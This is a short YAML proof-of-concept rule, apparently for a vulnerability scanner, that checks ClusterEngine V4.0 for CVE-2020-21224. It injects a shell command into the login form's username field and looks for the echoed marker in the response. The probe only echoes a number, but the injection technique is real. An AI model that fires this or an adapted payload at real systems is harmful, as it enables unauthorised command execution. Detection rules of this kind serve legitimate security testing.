name: poc-yaml-clusterEngine-rce-cve-2020-21224
rules:
  - method: POST
    path: /login
    headers:
      User-Agent: >-
        Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML,
        like Gecko) Chrome/87.0.4280.88 Safari/537.36
    body: op=login&username=;`echo 12345678987654321`&password=
    follow_redirects: false
    expression: |
      response.status==200 && response.body.bcontains(b'12345678987654321')
detail:
  author: jdr
  info: CVE-2020-21224(ClusterEngineV4.0 RCE)